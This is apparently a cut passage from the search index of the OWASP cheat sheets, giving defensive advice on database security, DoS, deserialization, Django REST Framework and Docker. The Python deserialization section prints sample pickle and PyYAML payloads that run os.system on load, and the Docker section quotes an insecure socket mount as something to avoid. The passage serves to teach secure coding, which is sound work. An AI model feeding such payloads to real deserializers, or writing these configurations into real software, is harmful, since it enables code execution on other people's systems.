"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#authentication","title":"Authentication","text":"

The database should be configured to always require authentication, including connections from the local server. Database accounts should be:

As with any system that has its own user accounts, the usual account management processes should be followed, including:

For Microsoft SQL Server, consider the use of Windows or Integrated-Authentication, which uses existing Windows accounts rather than SQL Server accounts. This also removes the requirement to store credentials in the application, as it will connect using the credentials of the Windows user it is running under. The Windows Native Authentication Plugins provides similar functionality for MySQL.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#storing-database-credentials","title":"Storing Database Credentials","text":"

Database credentials should never be stored in the application source code, especially if they are unencrypted. Instead, they should be stored in a configuration file that:

Where possible, these credentials should also be encrypted or otherwise protected using built-in functionality, such as the web.config encryption available in ASP.NET.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#permissions","title":"Permissions","text":"

The permissions assigned to database user accounts should be based on the principle of least privilege (i.e, the accounts should only have the minimal permissions required for the application to function). This can be applied at a number of increasingly granular levels depending on the functionality available in the database. The following steps should be applicable to all environments:

For more security-critical applications, it is possible to apply permissions at more granular levels, including:

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#database-configuration-and-hardening","title":"Database Configuration and Hardening","text":"

The underlying operating system for the database server should be hardened in the same way as any other server, based on a secure baseline such as the CIS Benchmarks or the Microsoft Security Baselines.

The database application should also be properly configured and hardened. The following principles should apply to any database application and platform:

The following sections gives some further recommendations for specific database software, in addition to the more general recommendations given above.

"},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#microsoft-sql-server","title":"Microsoft SQL Server","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mysql-and-mariadb","title":"MySQL and MariaDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#postgresql","title":"PostgreSQL","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#mongodb","title":"MongoDB","text":""},{"location":"cheatsheets/Database_Security_Cheat_Sheet.html#redis","title":"Redis","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html","title":"Denial of Service Cheat Sheet","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This sheet is focused on providing an overall, common overview with an informative, straight to the point guidance to propose angles on how to battle denial of service (DoS) attacks on different layers. It is by no means complete, however, it should serve as an indicator to inform the reader and to introduce a workable methodology to tackle this issue.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#fundamentals","title":"Fundamentals","text":"

Considering that anti-DoS approaches are not one-step solutions, it becomes apparent that, for it to be implemented, it's necessary to involve different profiles within your organization to assess the actual situation and to apply countermeasures accordingly. These profiles are: developers and architects in the area of application and infrastructure.

Key concepts within information security evolve around criteria or properties such as the CIA triad. The letter A, which stands for availability, is our focal point. The core essence of a DoS is to affect, by any means, the availability of instances or objects and to eventually render it inaccessible. Thus, for any information system to serve its purpose, it must be available at any time. Hence why every computing system within the interoperability flow must function correctly to achieve that.

To remain resilient and resistant, it's imperative - and suggested - to outline and to conduct a thorough analysis on components within your inventory based on functionality, architecture and performance (i.e. application-wise, infrastructure and network related).

The outcome of this research should identify potential causes of a DoS which highlight single point of failures ranging from programming related errors to resource exhaustion..

From a prevention point of view, it's important to have a clear picture on how to tackle your appropriate components to address the issue at stake (e.g. bottlenecks, etc.). That's why a solid understanding of your environment is essential to develop a suitable defence mechanism. These could be aligned with:

  1. scaling options (up = inner hardware components, out = the number of complete components)
  2. existing conceptual / logical techniques (such as applying redundancy measurements, bulk-heading, etc. - which expands your in-house capabilities)
  3. a cost analysis applied to your situation

Within this document we will adhere to a particular guidance structure to illustrate on how to analyse this subject based on your situation. It is by no means a complete approach but we ought to create fundamental blocks which should be utilized to assist you in constructing anti-DoS concepts fitting to your needs.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#general-categories-and-basic-controls","title":"General Categories and Basic Controls","text":"

In this cheat sheet, we will adhere to the DDOS classification as documented by CERT-EU. The document categorizes the 7 OSI model layers into three main attack categories, namely application, Session and Network.

TODO: Add Diagram

Application attacks focus on rendering applications unavailable by exhausting resources or by making it unusable in a functional way. Session (or protocol) attacks focus on consuming server resources, or resources of intermediary equipment like firewalls and load-balancers. Network (or volumetric) attacks focus on saturating the bandwidth of the network resource. It is important to understand that each of these three attack categories needs to be considered when designing a DoS resilient solution.

Note that OSI model layer 1 and 2 are not included in this categorization. In the spirit of providing a complete overview of all DoS type of attacks, we will shortly discuss these layers and how DoS applies to them.

The physical layer consists of the networking hardware transmission technologies of a network. It is a fundamental layer underlying the logical data structures of the higher-level functions in a network. Typical DoS scenarios are destruction, obstruction, malfunction. An example is a case where a Georgian elderly woman sliced through an underground cable, resulting in loss of internet for the whole of Armenia.

The data layer is the protocol layer that transfers data between adjacent network nodes in a wide area network (WAN) or between nodes on the same local area network (LAN) segment. Typical DoS scenarios are MAC flooding (targeting switch MAC tables) and ARP poisoning.

In MAC flooding attacks, a switch is flooded with packets, each with a different source MAC address. The intention is to consume the limited memory used by a switch to store the MAC and physical port translation table (MAC table). The result is that valid MAC addresses are purged and the switch enters a fail-over mode where it will act as a network hub. All data is then forwarded to all ports, resulting in a data leakage. TODO impact in relation to DoS TODO document compact remediation

In ARP poisoning attacks a malicious actor sends spoofed ARP (Address Resolution Protocol) messages over the wire. The result is that the attacker's MAC address can be linked to the IP address of a legitimate device on the network. This allows an attacker to intercept, modify or stop data in transit, that was intended for the victim IP address. The ARP protocol is specific to the local area network and could cause a DoS on the wire communication.

Packet filtering technology can be used to inspect packets in transit to identify and block offending ARP packets. Another approach is to use static ARP tables but they prove difficult to be maintained.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#application-attacks","title":"Application attacks","text":"

Application layer attacks focus on rendering applications unavailable by exhausting resources or by making it unusable in a functional way. These attacks do not have to consume the network bandwidth to be effective. Rather they place an operational strain on the application server in such a way that the server becomes unavailable, unusable or non-functional. All attacks exploiting weaknesses on OSI layer 7 protocol stack are generally categorised as application attacks. They are most challenging to identify/mitigate.

TODO: List all attacks per category. Because we cannot map remediations one on one with an attack vector, we will first need to list them before discussing the action points

Slow HTTP is a DoS attack type where HTTP requests are send very slow and fragmented, one at a time. Until the HTTP request was fully delivered, the server will keep resources stalled while waiting for the missing incoming data. At one moment, the server will reach the maximum concurrent connection pool, resulting in a DoS. From an attacker's perspective, slow HTTP attacks are cheap to perform because they require minimal resources.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#software-design-concepts","title":"Software Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#session","title":"Session","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#access-control","title":"Access control","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-attacks","title":"Network attacks","text":"

TODO: (Develop text) Attacks where network bandwidth gets saturation. Volumetric in nature. Amplification techniques make these attacks effective.

TODO: (list attacks) NTP amplification, DNS amplification, UDP flooding, TCP flooding

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#network-design-concepts","title":"Network Design Concepts","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#rate-limiting","title":"Rate limiting","text":"

Rate limiting is the process of controlling traffic rate from and to a server or component. It can be implemented on infrastructure as well as on an application level. Rate limiting can be based on (offending) IPs, on IP block lists, on geolocation, etc.

"},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#isp-level-remediations","title":"ISP-Level remediations","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#global-level-remediations-commercial-cloud-filter-services","title":"Global-Level remediations: Commercial cloud filter services","text":""},{"location":"cheatsheets/Denial_of_Service_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html","title":"Deserialization Cheat Sheet","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This article is focused on providing clear, actionable guidance for safely deserializing untrusted data in your applications.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#what-is-deserialization","title":"What is Deserialization","text":"

Serialization is the process of turning some object into a data format that can be restored later. People often serialize objects in order to save them for storage, or to send as part of communications.

Deserialization is the reverse of that process, taking data structured in some format, and rebuilding it into an object. Today, the most popular data format for serializing data is JSON. Before that, it was XML.

However, many programming languages have native ways to serialize objects. These native formats usually offer more features than JSON or XML, including customizability of the serialization process.

Unfortunately, the features of these native deserialization mechanisms can sometimes be repurposed for malicious effect when operating on untrusted data. Attacks against deserializers have been found to allow denial-of-service, access control, or remote code execution (RCE) attacks.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#guidance-on-deserializing-objects-safely","title":"Guidance on Deserializing Objects Safely","text":"

The following language-specific guidance attempts to enumerate safe methodologies for deserializing data that can't be trusted.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#php","title":"PHP","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review","title":"WhiteBox Review","text":"

Check the use of unserialize() function and review how the external parameters are accepted. Use a safe, standard data interchange format such as JSON (via json_decode() and json_encode()) if you need to pass serialized data to the user.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#python","title":"Python","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review","title":"BlackBox Review","text":"

If the traffic data contains the symbol dot . at the end, it's very likely that the data was sent in serialization.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_1","title":"WhiteBox Review","text":"

The following API in Python will be vulnerable to serialization attack. Search code for the pattern below.

  1. The uses of pickle/c_pickle/_pickle with load/loads:
import pickle\ndata = \"\"\" cos.system(S'dir')tR. \"\"\"\npickle.loads(data)\n
  1. Uses of PyYAML with load:
import yaml\ndocument = \"!!python/object/apply:os.system ['ipconfig']\"\nprint(yaml.load(document))\n
  1. Uses of jsonpickle with encode or store methods.
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#java","title":"Java","text":"

The following techniques are all good for preventing attacks against deserialization against Java's Serializable format.

Implementation advices:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_2","title":"WhiteBox Review","text":"

Be aware of the following Java API uses for potential serialization vulnerability.

1.\u00a0XMLdecoder\u00a0with\u00a0external\u00a0user\u00a0defined\u00a0parameters

2.\u00a0XStream\u00a0with\u00a0fromXML\u00a0method (xstream\u00a0version\u00a0<=\u00a0v1.4.6\u00a0is\u00a0vulnerable\u00a0to\u00a0the\u00a0serialization\u00a0issue)

3.\u00a0ObjectInputStream\u00a0with\u00a0readObject

4.\u00a0Uses\u00a0of\u00a0readObject,\u00a0readObjectNoData,\u00a0readResolve or\u00a0readExternal

5.\u00a0ObjectInputStream.readUnshared

6.\u00a0Serializable

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_1","title":"BlackBox Review","text":"

If the captured traffic data includes the following patterns, it may suggest that the data was sent in Java serialization streams:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-data-leakage-and-trusted-field-clobbering","title":"Prevent Data Leakage and Trusted Field Clobbering","text":"

If there are data members of an object that should never be controlled by end users during deserialization or exposed to users during serialization, they should be declared as the transient keyword (section Protecting Sensitive Information).

For a class that defined as Serializable, the sensitive information variable should be declared as private transient.

For example, the class myAccount, the variables 'profit' and 'margin' were declared as transient to prevent them from being serialized.

public class myAccount implements Serializable\n{\nprivate transient double profit; // declared transient\n\nprivate transient double margin; // declared transient\n....\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#prevent-deserialization-of-domain-objects","title":"Prevent Deserialization of Domain Objects","text":"

Some of your application objects may be forced to implement Serializable due to their hierarchy. To guarantee that your application objects can't be deserialized, a readObject() method should be declared (with a final modifier) which always throws an exception:

private final void readObject(ObjectInputStream in) throws java.io.IOException {\nthrow new java.io.IOException(\"Cannot be deserialized\");\n}\n
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-your-own-javaioobjectinputstream","title":"Harden Your Own java.io.ObjectInputStream","text":"

The java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. This is the best solution if:

The general idea is to override ObjectInputStream.html#resolveClass() in order to restrict which classes are allowed to be deserialized.

Because this call happens before a readObject() is called, you can be sure that no deserialization activity will occur unless the type is one that you allow.

A simple example is shown here, where the LookAheadObjectInputStream class is guaranteed to not deserialize any other type besides the Bicycle class:

public class LookAheadObjectInputStream extends ObjectInputStream {\n\npublic LookAheadObjectInputStream(InputStream inputStream) throws IOException {\nsuper(inputStream);\n}\n\n/**\n    * Only deserialize instances of our expected Bicycle class\n    */\n@Override\nprotected Class<?> resolveClass(ObjectStreamClass desc) throws IOException, ClassNotFoundException {\nif (!desc.getName().equals(Bicycle.class.getName())) {\nthrow new InvalidClassException(\"Unauthorized deserialization attempt\", desc.getName());\n}\nreturn super.resolveClass(desc);\n}\n}\n

More complete implementations of this approach have been proposed by various community members:

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#harden-all-javaioobjectinputstream-usage-with-an-agent","title":"Harden All java.io.ObjectInputStream Usage with an Agent","text":"

As mentioned above, the java.io.ObjectInputStream class is used to deserialize objects. It's possible to harden its behavior by subclassing it. However, if you don't own the code or can't wait for a patch, using an agent to weave in hardening to java.io.ObjectInputStream is the best solution.

Globally changing ObjectInputStream is only safe for block-listing known malicious types, because it's not possible to know for all applications what the expected classes to be deserialized are. Fortunately, there are very few classes needed in the blocklist to be safe from all the known attack vectors, today.

It's inevitable that more \"gadget\" classes will be discovered that can be abused. However, there is an incredible amount of vulnerable software exposed today, in need of a fix. In some cases, \"fixing\" the vulnerability may involve re-architecting messaging systems and breaking backwards compatibility as developers move towards not accepting serialized objects.

To enable these agents, simply add a new JVM parameter:

-javaagent:name-of-agent.jar\n

Agents taking this approach have been released by various community members:

A similar, but less scalable approach would be to manually patch and bootstrap your JVM's ObjectInputStream. Guidance on this approach is available here.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#net-csharp","title":".Net CSharp","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#whitebox-review_3","title":"WhiteBox Review","text":"

Search the source code for the following terms:

  1. TypeNameHandling
  2. JavaScriptTypeResolver

Look for any serializers where the type is set by a user controlled variable.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#blackbox-review_2","title":"BlackBox Review","text":"

Search for the following base64 encoded content that starts with:

AAEAAAD/////\n

Search for content with the following text:

  1. TypeObject
  2. $type:
"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#general-precautions","title":"General Precautions","text":"

Microsoft has stated that the BinaryFormatter type is dangerous and cannot be secured. As such, it should not be used. Full details are in the BinaryFormatter security guide.

Don't allow the datastream to define the type of object that the stream will be deserialized to. You can prevent this by for example using the DataContractSerializer or XmlSerializer if at all possible.

Where JSON.Net is being used make sure the TypeNameHandling is only set to None.

TypeNameHandling = TypeNameHandling.None\n

If JavaScriptSerializer is to be used then do not use it with a JavaScriptTypeResolver.

If you must deserialise data streams that define their own type, then restrict the types that are allowed to be deserialized. One should be aware that this is still risky as many native .Net types potentially dangerous in themselves. e.g.

System.IO.FileInfo\n

FileInfo objects that reference files actually on the server can when deserialized, change the properties of those files e.g. to read-only, creating a potential denial of service attack.

Even if you have limited the types that can be deserialised remember that some types have properties that are risky. System.ComponentModel.DataAnnotations.ValidationException, for example has a property Value of type Object. if this type is the type allowed for deserialization then an attacker can set the Value property to any object type they choose.

Attackers should be prevented from steering the type that will be instantiated. If this is possible then even DataContractSerializer or XmlSerializer can be subverted e.g.

// Action below is dangerous if the attacker can change the data in the database\nvar typename = GetTransactionTypeFromDatabase();\n\nvar serializer = new DataContractJsonSerializer(Type.GetType(typename));\n\nvar obj = serializer.ReadObject(ms);\n

Execution can occur within certain .Net types during deserialization. Creating a control such as the one shown below is ineffective.

var suspectObject = myBinaryFormatter.Deserialize(untrustedData);\n\n//Check below is too late! Execution may have already occurred.\nif (suspectObject is SomeDangerousObjectType)\n{\n//generate warnings and dispose of suspectObject\n}\n

For JSON.Net it is possible to create a safer form of allow-list control using a custom SerializationBinder.

Try to keep up-to-date on known .Net insecure deserialization gadgets and pay special attention where such types can be created by your deserialization processes. A deserializer can only instantiate types that it knows about.

Try to keep any code that might create potential gadgets separate from any code that has internet connectivity. As an example System.Windows.Data.ObjectDataProvider used in WPF applications is a known gadget that allows arbitrary method invocation. It would be risky to have this a reference to this assembly in a REST service project that deserializes untrusted data.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#known-net-rce-gadgets","title":"Known .NET RCE Gadgets","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#language-agnostic-methods-for-deserializing-safely","title":"Language-Agnostic Methods for Deserializing Safely","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#using-alternative-data-formats","title":"Using Alternative Data Formats","text":"

A great reduction of risk is achieved by avoiding native (de)serialization formats. By switching to a pure data format like JSON or XML, you lessen the chance of custom deserialization logic being repurposed towards malicious ends.

Many applications rely on a data-transfer object pattern that involves creating a separate domain of objects for the explicit purpose data transfer. Of course, it's still possible that the application will make security mistakes after a pure data object is parsed.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#only-deserialize-signed-data","title":"Only Deserialize Signed Data","text":"

If the application knows before deserialization which messages will need to be processed, they could sign them as part of the serialization process. The application could then to choose not to deserialize any message which didn't have an authenticated signature.

"},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#mitigation-toolslibraries","title":"Mitigation Tools/Libraries","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#detection-tools","title":"Detection Tools","text":""},{"location":"cheatsheets/Deserialization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html","title":"Django REST Framework (DRF) Cheat Sheet","text":""},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheat sheet intends to provide quick basic Django REST Framework security tips for developers.

The Django REST framework abstracts developers from quite a bit of tedious work and provides the means to build APIs quickly and with ease using Django. New developers, those unfamiliar with the inner workings of Django, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#settings","title":"Settings","text":"

All the Django REST Framework (DRF) configuration is done under the namespace REST_FRAMEWORK, usually in the settings.py file. From a security perspective, the most relevant ones are:

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_authentication_classes","title":"DEFAULT_AUTHENTICATION_CLASSES","text":"

A list of authentication classes that determines the default set of authenticators used when accessing the request.user or request.auth properties. In other words, what classes should be used to identify which user is authenticated.

Defaults are 'rest_framework.authentication.SessionAuthentication', 'rest_framework.authentication.BasicAuthentication', that means that by default it checks the session and basic authentication for the user.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_permission_classes","title":"DEFAULT_PERMISSION_CLASSES","text":"

A list of permission classes that determines the default set of permissions checked at the start of a view.

Permission must be granted by every class in the list. Default is 'rest_framework.permissions.AllowAny'18, that means that by default every view allows access to everybody.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_throttle_classes","title":"DEFAULT_THROTTLE_CLASSES","text":"

A list of throttle classes that determines the default set of throttles checked at the start of a view. Default is empty, that means that by default there is no throttling in place.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#default_pagination_class","title":"DEFAULT_PAGINATION_CLASS","text":"

The default class to use for queryset pagination. Pagination is disabled by default. Lack of proper pagination could lead to Denial of Service (DoS) in cases where there\u2019s a lot of data.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#owasp-api-security-top-10","title":"OWASP API Security Top 10","text":"

The OWASP API Security Top 10 is a list of the most critical security risks for APIs, developed by the Open Web Application Security Project (OWASP). It is intended to help organizations identify and prioritize the most significant risks to their APIs, so that they can implement appropriate controls to mitigate those risks.

This section is based on this. Your approach to securing your web API should be to start at the top threat A1 below and work down, this will ensure that any time spent on security will be spent most effectively spent and cover the top threats first and lesser threats afterwards. After covering the top 10 it is generally advisable to assess for other threats or get a professionally completed Penetration Test.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api12019-broken-object-level-authorization","title":"API1:2019 Broken Object Level Authorization","text":"

When using object-level permissions:

DO: Validate that the object can be accessed by the user using the method .check_object_permissions(request, obj). Example:

def get_object(self):\n    obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n    self.check_object_permissions(self.request, obj)\n    return obj\n

DO NOT: Override the method get_object() without checking if the request should have access to that object.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api22019-broken-user-authentication","title":"API2:2019 Broken User Authentication","text":"

DO: Use the setting value DEFAULT_AUTHENTICATION_CLASSES with the correct classes for your project.

DO: Have authentication on every non-public API endpoint.

DO NOT: Overwrite the authentication class on a class-based (variable authentication_classes) or function-based (decorator authentication_classes) view unless you are confident about the change and understand the impact.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api32019-excessive-data-exposure","title":"API3:2019 Excessive Data Exposure","text":"

DO: Review the serializer and the information you are displaying.

If the serializer is inheriting from ModelSerializer DO NOT use the exclude Meta property.

DO NOT: Display more information that the minimum required.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api42019-lack-of-resources-rate-limiting","title":"API4:2019 Lack of Resources & Rate Limiting","text":"

DO: Configure the setting DEFAULT_THROTTLE_CLASSES.

DO NOT: Overwrite the throttle class on a class-based (variable throttle_classes) or function-based (decorator throttle_classes) view unless you are confident about the change and understand the impact.

EXTRA: If possible rate limiting should also be done with a WAF or similar. DRF should be the last layer of rate limiting.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api52019-broken-function-level-authorization","title":"API5:2019 Broken Function Level Authorization","text":"

DO: Change the default value ('rest_framework.permissions.AllowAny') of DEFAULT_PERMISSION_CLASSES.

DO NOT: Use rest_framework.permissions.AllowAny except for public API endpoints.

DO: Use the setting value DEFAULT_PERMISSION_CLASSES with the correct classes for your project.

DO NOT: Overwrite the authorization class on a class-based (variable permission_classes) or function-based (decorator permission_classes) view unless you are confident about the change and understand the impact.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api62019-mass-assignment","title":"API6:2019 Mass Assignment","text":"

When using ModelForms:

DO: Use Meta.fields (allow list approach).

DO NOT: Use Meta.exclude (block list approach).

DO NOT: Use ModelForms.Meta.fields = \"__all__\"

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api72019-security-misconfiguration","title":"API7:2019 Security Misconfiguration","text":"

DO: Setup Django settings DEBUG and DEBUG_PROPAGATE_EXCEPTIONS to False.

DO: Setup Django setting SECRET_KEY to a random value. Never hardcode secrets.

DO: Have a repeatable hardening process leading to fast and easy deployment of a properly locked down environment.

DO: Have an automated process to continuously assess the effectiveness of the configuration and settings in all environments.

DO: Ensure API can only be accessed by the specified HTTP verbs. All other HTTP verbs should be disabled.

DO NOT: Use default passwords

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api82019-injection","title":"API8:2019 Injection","text":"

DO: Validate, filter, and sanitize all client-provided data, or other data coming from integrated systems.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sqli","title":"SQLi","text":"

DO: Use parametrized queries.

TRY NOT TO: Use dangerous methods like raw(), extra() and custom SQL (via cursor.execute()).

DO NOT: Add user input to dangerous methods (raw(), extra(), cursor.execute()).

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#rce","title":"RCE","text":"

DO NOT: Add user input to dangerous methods (eval(), exec() and execfile()).

DO NOT: Load user-controlled pickle files. This includes the pandas method pandas.read_pickle().

DO NOT: Load user-controlled YAML files using the method load().

DO: Use the Loader=yaml.SafeLoader for YAML files.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api92019-improper-assets-management","title":"API9:2019 Improper Assets Management","text":"

DO: Have an inventory of all API hosts and document important aspects of each one of them, focusing on the API environment (e.g., production, staging, test, development), who should have network access to the host (e.g., public, internal, partners) and the API version.

DO: Document all aspects of your API such as authentication, errors, redirects, rate limiting, cross-origin resource sharing (CORS) policy and endpoints, including their parameters, requests, and responses.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#api102019-insufficient-logging-monitoring","title":"API10:2019 Insufficient Logging & Monitoring","text":"

DO: Log all failed authentication attempts, denied access, and input validation errors with sufficient user context to identify suspicious or malicious accounts.

DO: Create logs in a format suited to be consumed by a log management solution and should include enough detail to identify the malicious actor.

DO: Handle logs as sensitive data, and their integrity should be guaranteed at rest and transit.

DO: Configure a monitoring system to continuously monitor the infrastructure, network, and the API functioning.

DO: Use a Security Information and Event Management (SIEM) system to aggregate and manage logs from all components of the API stack and hosts.

DO: Configure custom dashboards and alerts, enabling suspicious activities to be detected and responded to earlier.

DO: Establish effective monitoring and alerting so suspicious activities are detected and responded to in a timely fashion.

DO NOT: Log generic error messages such as: Log.Error(\"Error was thrown\"); rather log the stack trace, error message and user ID who caused the error.

DO NOT: Log sensitive data such as user's passwords, API Tokens or PII.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#other-security-risks","title":"Other security Risks","text":"

Below is a list of security risks for APIs not discussed in the OWASP API Security Top 10.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do threat model, security design review, code review, pair program and write unit tests.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#secret-management","title":"Secret Management","text":"

Secrets should never be hardcoded. The best practice is to use a Secret Manager. For more information review OWASP Secrets Management Cheat Sheet

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#updating-django-and-drf-and-having-a-process-for-updating-dependencies","title":"Updating Django and DRF and Having a Process for Updating Dependencies","text":"

An concern with every application, including Python applications, is that dependencies can have vulnerabilities.

One good practice is to audit the dependencies your project is using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of response:

The Django Security team has a information on How Django discloses security issues.

Finally, an important aspect when considering if a new dependency should be added or not to the project is the \"Security Health\" of the library. How often it's updated? Does it have known vulnerabilities? Does it have an active community? etc. Some tools can help with this task (E.g. Snyk Advisor)

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#sast-tools","title":"SAST Tools","text":"

There are several excellent open-source static analysis security tools for Python that are worth considering, including:

Bandit \u2013 Bandit is a tool designed to find common security issues in Python. To do this Bandit processes each file, builds an Abstract Syntax Tree (AST) from it, and runs appropriate plugins against the AST nodes. Once Bandit has finished scanning all the files it generates a report. Bandit was originally developed within the OpenStack Security Project and later rehomed to PyCQA.

Semgrep \u2013 Semgrep is a fast, open-source, static analysis engine for finding bugs, detecting vulnerabilities in third-party dependencies, and enforcing code standards. Developed by \u201cReturn To Corporation\u201d (usually referred to as r2c) and open-source contributors. It works based on rules, which can focus on security, language best practices, or something else. Creating a rule is easy and semgrep is very powerful. For Django there are 29 rules.

PyCharm Security \u2013 Pycharm-security is a plugin for PyCharm, or JetBrains IDEs with the Python plugin. The plugin looks at Python code for common security vulnerabilities and suggests fixes. It can also be executed from a Docker container. It has about 40 checks and some are Django specific.

"},{"location":"cheatsheets/Django_REST_Framework_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html","title":"Docker Security Cheat Sheet","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Docker is the most popular containerization technology. Upon proper use, it can increase the level of security (in comparison to running applications directly on the host). On the other hand, some misconfigurations can lead to downgrade the level of security or even introduce new vulnerabilities.

The aim of this cheat sheet is to provide an easy to use list of common security mistakes and good practices that will help you secure your Docker containers.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rules","title":"Rules","text":""},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-0-keep-host-and-docker-up-to-date","title":"RULE #0 - Keep Host and Docker up to date","text":"

To prevent from known, container escapes vulnerabilities, which typically end in escalating to root/administrator privileges, patching Docker Engine and Docker Machine is crucial.

In addition, containers (unlike in virtual machines) share the kernel with the host, therefore kernel exploits executed inside the container will directly hit host kernel. For example, kernel privilege escalation exploit (like Dirty COW) executed inside a well-insulated container will result in root access in a host.

"},{"location":"cheatsheets/Docker_Security_Cheat_Sheet.html#rule-1-do-not-expose-the-docker-daemon-socket-even-to-the-containers","title":"RULE #1 - Do not expose the Docker daemon socket (even to the containers)","text":"

Docker socket /var/run/docker.sock is the UNIX socket that Docker is listening to. This is the primary entry point for the Docker API. The owner of this socket is root. Giving someone access to it is equivalent to giving unrestricted root access to your host.

Do not enable tcp Docker daemon socket. If you are running docker daemon with -H tcp://0.0.0.0:XXX or similar you are exposing un-encrypted and unauthenticated direct access to the Docker daemon, if the host is internet connected this means the docker daemon on your computer can be used by anyone from the public internet. If you really, really have to do this, you should secure it. Check how to do this following Docker official documentation.

Do not expose /var/run/docker.sock to other containers. If you are running your docker image with -v /var/run/docker.sock://var/run/docker.sock or similar, you should change it. Remember that mounting the socket read-only is not a solution but only makes it harder to exploit. Equivalent in the docker-compose file is something like this:

volumes:\n- \"/var/run/docker.sock:/var/run/docker.sock\"\n
